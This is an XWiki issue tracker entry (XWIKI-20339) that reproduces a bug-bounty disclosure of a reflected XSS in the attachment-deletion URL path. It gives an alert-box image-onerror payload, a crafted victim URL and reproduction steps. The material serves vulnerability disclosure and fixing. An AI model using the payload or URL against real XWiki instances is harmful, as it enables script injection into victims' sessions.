Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20339

RXSS in URL path - /xwiki/bin/delattachment/XWiki/<USER>/<PAYLOAD>

    XMLWordPrintable

Details

    • Unknown
    • N/A

    Description

      SUBMISSION REFERENCES

      RESEARCHER INFORMATION

      • Submitter: ynoof

      SUBMISSION INFORMATION

      • Created at: Sun, 06 Nov 2022 17:25:58 GMT
      • Submission status: Archived

      REPORT CONTENT

      I've found a reflected XSS vulnerability at the endpoint https://intigriti.xwiki.com/xwiki/bin/delattachment/XWiki/<USER>/<VULN> , the attacker needs to put the username of the victim in the URL, and then send the URL to the victim to execute the vulnerability.

          1. Payload
            ```html
            <img src=x onerror=alert(document.domain)>
            ```
          1. Vulnerable Code
            ```html
            <p class="xwikimessage">Failed to delete attachment <img src="x" onerror="alert(document.domain)"></p>
            ```
          1. Steps to reproduce
            1. Send the following URL to the victim user with edit the user part.
            https://intigriti.xwiki.com/xwiki/bin/delattachment/XWiki/<USER-HERE>/<img src=x onerror=alert(document.domain)>
            2. You will get the following message, Click on `Yes` and the XSS alert will pop up.
      {882537}
          1. POC
      {410203}

      Thanks,
      Ynoof

      Attachments

        1. 410203_poc.png
          24 kB
          Intigriti Integration
        2. 882537_1.png
          26 kB
          Intigriti Integration

        Issue Links

          Activity

            People

              surli Simon Urli
              intigriti Intigriti Integration
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: